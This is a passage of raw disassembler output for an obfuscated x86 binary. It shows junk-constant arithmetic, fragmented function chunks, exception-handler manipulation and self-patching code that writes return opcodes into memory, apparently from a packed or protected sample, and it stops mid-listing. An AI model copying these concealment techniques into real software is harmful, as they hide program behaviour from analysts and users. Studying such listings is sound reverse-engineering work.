; FUNCTION CHUNK AT 00443554 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004441ED SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444C5F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004460BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044611A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448B0C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448C99 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004498A6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004499B5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449B80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B7FC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C2F2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D10C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044F5D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FCFA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004502CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450707 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450B35 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004521A9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004524F2 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045258B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452988 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452F38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454AA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004563F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457CF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458181 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004582BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458ED8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD00 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045AD60 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045BA94 SIZE 00000017 BYTES

		jno	loc_443554
		push	49B5A5B8h
		jmp	loc_44611A
sub_457D4B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	eax, 27B3C154h
		js	loc_442022
		jmp	sub_4568DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_457D6C:				; CODE XREF: sub_45A323-7A8Bj
		mov	edi, edx
		jle	loc_45852E
		shl	ebx, 8
		jmp	loc_453024
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_457D7C:				; CODE XREF: k2vbe3.d:loc_447428j
		add	ebx, 8E4449Dh
		xchg	ebx, [esp]
		jmp	nullsub_480
; ---------------------------------------------------------------------------

loc_457D8A:				; CODE XREF: k2vbe3.d:loc_44D706j
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		call	sub_4596A9
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_457D95:				; CODE XREF: sub_442F31+A2F5j
		jmp	sub_44635E
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------
		pop	eax
		jmp	sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_457DA0:				; CODE XREF: sub_447E07:loc_44269Cj
		jz	loc_447F9C
		jmp	loc_4466FA
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451719

loc_457DAB:				; CODE XREF: sub_451719:loc_43CA05j
		pop	ebx

loc_457DAC:				; CODE XREF: k2vbe3.d:00443A4Dj
					; k2vbe3.d:loc_44675Aj
		xchg	eax, edx
		call	sub_45B20A
		retn
; END OF FUNCTION CHUNK	FOR sub_451719
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543B0

loc_457DB3:				; CODE XREF: sub_4543B0+Dj
		mov	eax, ebp
		pop	ebp
		xor	eax, 9C5C97DDh
		rol	eax, 16h
		add	eax, 483713D9h
		jmp	loc_44047B
; END OF FUNCTION CHUNK	FOR sub_4543B0

; =============== S U B	R O U T	I N E =======================================



sub_457DCA	proc near		; CODE XREF: sub_450158+7p
					; k2vbe3.d:004504ACj

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C9C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D902 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E0C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F1CA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440F3C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441271 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A5C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441E28 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442014 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004426BB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00442A55 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444414 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004447B5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004469CA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447E58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004495CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E301 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F8BD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F94E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453C8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453DF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455082 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045520E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455F89 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004565A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458A4E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004595C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AF03 SIZE 0000000B BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi
		xchg	ebp, [esp+0]
		push	eax
		push	50DAB67Ah
		jmp	loc_43C9C6
sub_457DCA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457DDC:				; CODE XREF: k2vbe3.d:00456E2Aj
		jnp	loc_43FD92

loc_457DE2:				; CODE XREF: k2vbe3.d:loc_456E1Dj
		add	eax, 0D0259104h
		add	eax, ebp
		add	eax, 1BB8C5F8h
		mov	eax, [eax]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jmp	loc_44B0D8
; ---------------------------------------------------------------------------

loc_457E03:				; CODE XREF: k2vbe3.d:loc_43F720j
		cmp	ecx, 0B2ADCFE7h
		jmp	loc_4428E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FDAC

loc_457E0E:				; CODE XREF: sub_44FDAC+Bj
		mov	ebx, edx
		xchg	ebx, [esp+0]
		push	ebx
		push	0D136E6F7h
		push	offset sub_440EE3
		jmp	loc_45B1E9
; END OF FUNCTION CHUNK	FOR sub_44FDAC
; ---------------------------------------------------------------------------

loc_457E23:				; DATA XREF: sub_44E6B8+7o
		push	0
		push	0
		push	0
		push	1
		push	0A9F4EE1Ch
		pop	eax
		xor	eax, 3C1E211Dh
		jmp	loc_449536
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ECA6

loc_457E3D:				; CODE XREF: sub_44ECA6+5j
		jmp	loc_456752
; END OF FUNCTION CHUNK	FOR sub_44ECA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_457E42:				; CODE XREF: sub_44B2D7j
		push	eax
		push	564565E2h
		pop	eax
		rol	eax, 1
		sub	eax, 0F074A8CFh
		rol	eax, 1Dh
		jmp	loc_4455A8
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_457E59:				; CODE XREF: sub_452092-10854j
		jnb	loc_44FE14

loc_457E5F:				; CODE XREF: sub_452092:loc_448047j
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 50h
		push	eax
		push	33A5ECFDh
		jmp	loc_44D7FD
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------

loc_457E79:				; CODE XREF: k2vbe3.d:0043F1EAj
		jnz	loc_451D4C
		jmp	loc_44D8A0
; ---------------------------------------------------------------------------

loc_457E84:				; CODE XREF: k2vbe3.d:loc_44AD18j
		xor	ebp, edx
		jmp	sub_4448B3
; ---------------------------------------------------------------------------

locret_457E8B:				; CODE XREF: k2vbe3.d:00443A0Ej
		retn
; ---------------------------------------------------------------------------

loc_457E8C:				; CODE XREF: k2vbe3.d:0044E6B3j
		jmp	loc_452736
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_457E92:				; CODE XREF: k2vbe3.d:00459C60j
					; sub_441D41:loc_45BC68j
		push	offset loc_450751
		jmp	loc_43E233
; END OF FUNCTION CHUNK	FOR sub_441D41

; =============== S U B	R O U T	I N E =======================================



sub_457E9C	proc near		; CODE XREF: k2vbe3.d:00442D3Dj
					; sub_44ED3C+B9DAp

; FUNCTION CHUNK AT 0043C3B1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00444F8C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045AC55 SIZE 00000010 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		push	53131AD9h
		jmp	loc_43C3B1
sub_457E9C	endp

; ---------------------------------------------------------------------------

loc_457EAB:				; CODE XREF: k2vbe3.d:loc_44A380j
					; k2vbe3.d:0044AB55j
		cmp	dword ptr [ebp-1C8h], 2B584245h
		jnz	loc_4569E3
		jmp	loc_452846
; ---------------------------------------------------------------------------
		adc	edi, 536C60F4h
		sbb	eax, 6D53F45Ch
		jmp	sub_455C7A
; ---------------------------------------------------------------------------

loc_457ED1:				; CODE XREF: k2vbe3.d:loc_446DD7j
		jz	loc_444AF3
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_457ED7:				; CODE XREF: sub_44BDBB+6E3Aj
		jmp	loc_4414F4
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
		test	ebx, edx
		jmp	loc_453D87
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D6A

loc_457EE6:				; CODE XREF: sub_440D6A:loc_44DABAj
					; sub_43E135+13E45j ...
		push	eax
		mov	eax, ebp
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		jb	sub_459A53
		jmp	sub_446212
; END OF FUNCTION CHUNK	FOR sub_440D6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_457EF9:				; CODE XREF: sub_45AA63:loc_45462Fj
		push	edx
		call	sub_43C206
		mov	eax, 201E933Eh
		push	edx
		push	5D42EF24h
		jmp	loc_456929
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475D5

loc_457F0F:				; CODE XREF: sub_4475D5-22D5j
		mov	esi, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_4475D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_457F13:				; CODE XREF: sub_4505F8-B78Bj
		rol	eax, 5
		push	eax
		jmp	loc_45C1A0
; END OF FUNCTION CHUNK	FOR sub_4505F8

; =============== S U B	R O U T	I N E =======================================



sub_457F1C	proc near		; CODE XREF: sub_453141:loc_444F24j
					; sub_450158:loc_450164j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044F6AC SIZE 0000002D BYTES
; FUNCTION CHUNK AT 0045314F SIZE 00000008 BYTES

		pop	edx
		js	loc_45314F

loc_457F23:				; CODE XREF: k2vbe3.d:0044F5CAj
		mov	eax, [esp+0]
		push	edx
		call	sub_454E83
		push	1245FC70h
		pop	eax
		rol	eax, 0Eh
		jmp	loc_44F6AC
sub_457F1C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	edx, eax
		jmp	loc_4575D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_457F41:				; CODE XREF: sub_447E07:loc_447E17j
		jns	loc_44A196
		sub	al, 99h
		push	3611ED99h
		pop	edx
		or	edx, 527E5D02h
		rol	edx, 16h
		sub	edx, ds:4000E8h
		jmp	loc_456D00
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_457F63:				; CODE XREF: k2vbe3.d:loc_44A3D3j
		rol	eax, 13h
		sub	eax, 82E07CCEh
		and	eax, 0DFA5251Ch
		xor	eax, 38F36492h
		call	sub_451759
		mov	ds:off_41E034, eax
		push	offset loc_4423F5

loc_457F88:				; CODE XREF: k2vbe3.d:loc_4594C4j
		jmp	locret_44909F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597E6

loc_457F8D:				; CODE XREF: sub_4597E6-14802j
		jz	loc_44F748
		jmp	loc_44A365
; END OF FUNCTION CHUNK	FOR sub_4597E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EABB

loc_457F98:				; CODE XREF: sub_44EABB+11j
		pop	ecx
		or	ecx, 451224Ch
		and	ecx, 8A68D95Ah
		or	ecx, 160E5945h
		jmp	loc_44222A
; END OF FUNCTION CHUNK	FOR sub_44EABB

; =============== S U B	R O U T	I N E =======================================



sub_457FB0	proc near		; DATA XREF: sub_43E67B+Ao
		call	sub_447BE9
		mov	eax, 0F074E076h
		call	sub_4553CC
		mov	ds:off_41E084, eax
		lea	eax, sub_45AB7E
		mov	byte ptr [eax],	0C3h
		jmp	sub_45AB7E
sub_457FB0	endp

; ---------------------------------------------------------------------------

loc_457FD3:				; DATA XREF: sub_445FE0:loc_45953Eo
		call	sub_444FB1
		push	286872FBh
		pop	eax
		add	eax, 85319395h
		rol	eax, 2
		jmp	loc_447400
; ---------------------------------------------------------------------------
		mov	eax, 4C5D3995h
		push	eax
		push	0D4F67664h
		pop	eax
		sub	eax, 5B20E284h
		jnb	loc_4588C2
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_458004:				; CODE XREF: sub_44F028+B0BBj
		jmp	loc_45C106
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_458009:				; CODE XREF: sub_440EE3+12FDj
		jmp	loc_43DD71
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
		jz	loc_4562D0
		jmp	loc_4588BB

; =============== S U B	R O U T	I N E =======================================



sub_458019	proc near		; CODE XREF: sub_44662B:loc_446AC5p
					; k2vbe3.d:0045BEB4j

; FUNCTION CHUNK AT 0043E964 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442CD5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444C7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493B0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F525 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045860A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, offset dword_441770
		call	sub_445024
		cmp	ds:dword_441774, 0
		jmp	loc_43E964
sub_458019	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_458033:				; CODE XREF: k2vbe3.d:0044A5B9j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4445FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_45803B:				; CODE XREF: sub_45156D+3F4j
		mov	eax, [esp+0]
		push	ebp

loc_45803F:				; CODE XREF: k2vbe3.d:0045A7F2j
		mov	ebp, edx
		jmp	loc_44EAF8
; END OF FUNCTION CHUNK	FOR sub_45156D

; =============== S U B	R O U T	I N E =======================================



sub_458046	proc near		; DATA XREF: sub_43C745+1143Eo
		xor	ecx, 0BB7AFD60h
		xor	eax, ecx
		pop	ecx
		rol	eax, 10h
		push	offset sub_44543E
		jmp	loc_458CCD
sub_458046	endp

; ---------------------------------------------------------------------------
		jmp	ds:dword_41E130
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_458062:				; CODE XREF: sub_44471B-2C65j
		jmp	loc_44A66E
; END OF FUNCTION CHUNK	FOR sub_44471B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_250. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FE5DEE82h, 48B5AFFh, 0EA8B5524h, 0E9242C87h, 0FFFF431Eh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_45807C:				; CODE XREF: sub_446478+3B8Cj
		mov	eax, 68F52BA0h
		jmp	loc_4400B0
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------

loc_458086:				; DATA XREF: sub_4551FC:loc_443D1Co
		xchg	edx, [esp]
		mov	eax, [ebp+8]
		push	edi
		mov	edi, esi
		xchg	edi, [esp]
		mov	esi, eax
		xchg	esi, [esp]
		jmp	loc_44E80D
; ---------------------------------------------------------------------------

locret_45809C:				; CODE XREF: k2vbe3.d:0044D45Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_45809D:				; CODE XREF: sub_4597AE:loc_456CCCj
		jmp	loc_447418
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_4580A2:				; CODE XREF: sub_44DCF5+Fj
		and	edx, 903562EFh
		add	edx, 3A5D38h
		add	edx, ebp
		add	edx, 6FC142ABh
		mov	edx, [edx]
		cmp	eax, [edx+18h]
		jnb	loc_44A38C
		jmp	loc_44378A
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_4580C6:				; CODE XREF: sub_45451C:loc_44EA1Fj
		jz	loc_444DDD
		jmp	loc_451A9E
; END OF FUNCTION CHUNK	FOR sub_45451C

; =============== S U B	R O U T	I N E =======================================



sub_4580D1	proc near		; DATA XREF: k2vbe3.d:004446DCo

; FUNCTION CHUNK AT 0045939E SIZE 00000005 BYTES

		lea	eax, loc_4593B7
		mov	byte ptr [eax],	0C3h
		jmp	loc_45939E
sub_4580D1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4580DF	proc near		; CODE XREF: sub_41A89D+A5p
					; sub_41A89D+1B6p ...

; FUNCTION CHUNK AT 0043C05F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043D64C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043E484 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044033B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004431A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004451F7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446A01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044825D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448E4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD75 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D0CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAB4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E8B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FC92 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004505EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004521F6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454BA5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455B48 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457505 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B5E6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045BE8A SIZE 0000000A BYTES

		push	edi
		push	93ACB0B9h
		adc	edi, 51465713h
		jmp	loc_44D0CB
sub_4580DF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_4580F0	proc near		; CODE XREF: sub_4461D5:loc_4450C0j
		retn
sub_4580F0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A4F5

loc_4580F1:				; CODE XREF: sub_44A4F5+9j
		jmp	nullsub_312
; END OF FUNCTION CHUNK	FOR sub_44A4F5

; =============== S U B	R O U T	I N E =======================================



sub_4580F6	proc near		; CODE XREF: k2vbe3.d:0043D513j
					; sub_444D7B:loc_44C0E0p
		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 102B419Dh
		mov	[ecx], eax
		push	offset loc_451D66
		jmp	nullsub_266
sub_4580F6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F946

loc_45810C:				; CODE XREF: sub_44F946-576Aj
		add	edx, 707131E5h
		xchg	edx, [esp+4+var_4]
		jmp	loc_44D548
; END OF FUNCTION CHUNK	FOR sub_44F946

; =============== S U B	R O U T	I N E =======================================



sub_45811A	proc near		; DATA XREF: sub_43EFDA:loc_44CFF8o

; FUNCTION CHUNK AT 00443689 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E06A SIZE 0000000E BYTES

		push	ebx
		push	6D6E56FDh
		pop	ebx
		rol	ebx, 4
		and	ebx, 6D4719B7h
		jmp	loc_44E06A
sub_45811A	endp


; =============== S U B	R O U T	I N E =======================================



sub_45812F	proc near		; DATA XREF: sub_44660F:loc_43CD49o

; FUNCTION CHUNK AT 00441F98 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DFD6 SIZE 00000005 BYTES

		xor	eax, 0EFF5247h
		add	eax, ebp
		add	eax, 36194305h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441F98
		jmp	loc_458EFC
sub_45812F	endp


; =============== S U B	R O U T	I N E =======================================



sub_45814D	proc near		; CODE XREF: sub_440863+2p

; FUNCTION CHUNK AT 0044D701 SIZE 00000005 BYTES

		push	offset loc_458C24
		jmp	loc_44D701
sub_45814D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_458157:				; CODE XREF: k2vbe3.d:00457783j
					; sub_45A4C1:loc_45BC0Fj
		add	eax, 46FEDEAAh
		add	eax, ebp
		add	eax, 0AD00F035h
		mov	dword ptr [eax], offset	dword_474244
		jmp	sub_43D244
; END OF FUNCTION CHUNK	FOR sub_45A4C1
; ---------------------------------------------------------------------------

loc_458170:				; CODE XREF: k2vbe3.d:00446FE4j
		retn
; ---------------------------------------------------------------------------

loc_458171:				; CODE XREF: k2vbe3.d:0044D48Bj
		jmp	loc_43ED83
; ---------------------------------------------------------------------------
		jns	loc_4467E5
		jmp	sub_452693
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_458181:				; CODE XREF: sub_457D4B:loc_44F5D9j
					; DATA XREF: sub_442C7E+7o
		xchg	esi, [esp+4+var_4]
		mov	esp, ebp
		xchg	edx, [esp+4+var_4]
		mov	ebp, edx
		pop	edx
		jmp	loc_458ED8
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_458191:				; CODE XREF: sub_44D2F1:loc_4574DAj
		shl	edx, 0Bh
		jmp	loc_44E60B
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_458199:				; CODE XREF: sub_444D7B:loc_45B34Bj
		jz	loc_43D583
		jmp	loc_4527EC
; END OF FUNCTION CHUNK	FOR sub_444D7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_279. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452693

loc_4581A5:				; CODE XREF: sub_452693+Aj
		jmp	loc_43E588
; END OF FUNCTION CHUNK	FOR sub_452693
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_4581AA:				; CODE XREF: sub_446258+1j
		jz	loc_43D4CA
		mov	eax, [esp+4+var_4]
		push	ebp
		push	edx
		and	ebp, 6A25BA10h
		jmp	loc_43FEA3
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F73B

loc_4581C0:				; CODE XREF: sub_43F73B:loc_45177Aj
		push	4028B0F6h
		pop	edx
		xor	edx, 0B1B34177h
		or	edx, 198326DAh
		jmp	loc_451B34
; END OF FUNCTION CHUNK	FOR sub_43F73B
; ---------------------------------------------------------------------------

loc_4581D7:				; CODE XREF: k2vbe3.d:00452499j
		or	edx, 4D63741Bh
		add	edx, 447A9Dh
		mov	[edx], eax
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		call	sub_459382
		jmp	loc_44ABC2
; ---------------------------------------------------------------------------

loc_4581F5:				; CODE XREF: k2vbe3.d:004598A4j
		push	0B1D68887h
		pop	edx
		add	edx, 3CE5BEA6h
		sub	edx, ds:4000E9h
		jmp	loc_444A5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45820C:				; CODE XREF: sub_44921C+5606j
		adc	ebx, ebp
		pop	ebx
		jmp	loc_4579E3
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_458214:				; CODE XREF: sub_451EEA:loc_459D85j
		jnz	loc_44AF8D
		jmp	loc_43C788
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45821F:				; CODE XREF: sub_454E69+6EB1j
		add	edi, ds:4000EBh
		xor	edi, 0CC206548h
		add	edi, 65C0A629h
; END OF FUNCTION CHUNK	FOR sub_454E69
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_458231:				; CODE XREF: sub_4424CF:loc_446E82j
		xchg	edi, [esp-0Ch+arg_4]
		jmp	loc_44DD49
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458951

loc_458239:				; CODE XREF: sub_458951:loc_45315Cj
		xchg	ebx, [esp+8+var_8]
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_458241:				; CODE XREF: sub_454E83:loc_44D7F7j
		jz	loc_440A81
; END OF FUNCTION CHUNK	FOR sub_454E83
; START	OF FUNCTION CHUNK FOR sub_4541EC

loc_458247:				; CODE XREF: sub_4541EC+Cj
		jmp	loc_453DB0
; END OF FUNCTION CHUNK	FOR sub_4541EC
; ---------------------------------------------------------------------------
		ror	esi, 2
		shr	esi, 1Bh
		mov	ebp, 9ED7F54Bh
		jmp	loc_44E171

; =============== S U B	R O U T	I N E =======================================



sub_45825C	proc near		; CODE XREF: sub_4505AFj
					; DATA XREF: sub_44BDBB:loc_4505A5o
		pop	ebx
		add	eax, 0E7E6FDA7h
		ror	eax, 10h
		sub	eax, 74A51BA3h
		ror	eax, 0Dh
		push	offset sub_458F54
		jmp	loc_43FA12
sub_45825C	endp


; =============== S U B	R O U T	I N E =======================================



sub_458279	proc near		; CODE XREF: sub_44F028:loc_440800p
					; k2vbe3.d:0044ED99j
		xchg	edx, [esp+0]
		pop	edx
		xor	eax, 6D50A029h
		add	eax, ebp
		add	eax, 0E9075B32h
		mov	eax, [eax]
		mov	eax, [eax]
		jmp	loc_450EB2
sub_458279	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459216

loc_458294:				; CODE XREF: sub_459216+17j
		jnz	loc_4475E1
		lea	eax, [ebp-125h]
		push	eax
		call	sub_448D3A
		jmp	loc_4502B0
; END OF FUNCTION CHUNK	FOR sub_459216
; ---------------------------------------------------------------------------
		jnp	loc_455D2E
		push	72179F2Dh
		jmp	sub_458BA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4582BB:				; CODE XREF: sub_457D4B:loc_450FE7j
		jz	loc_4498AA
		jmp	loc_449B80
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_4582C6:				; CODE XREF: sub_44ED3C-3D9Bj
